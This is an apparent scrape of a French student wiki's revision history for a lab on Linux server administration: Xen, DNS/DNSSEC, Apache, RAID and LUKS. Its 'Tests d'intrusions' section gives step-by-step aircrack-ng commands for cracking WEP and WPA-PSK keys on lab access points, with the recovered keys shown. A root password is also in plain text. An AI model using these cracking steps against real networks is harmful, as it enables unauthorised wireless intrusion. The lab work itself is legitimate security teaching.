On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57835</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57835"/>
				<updated>2022-01-11T14:37:35Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* 5.3  Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
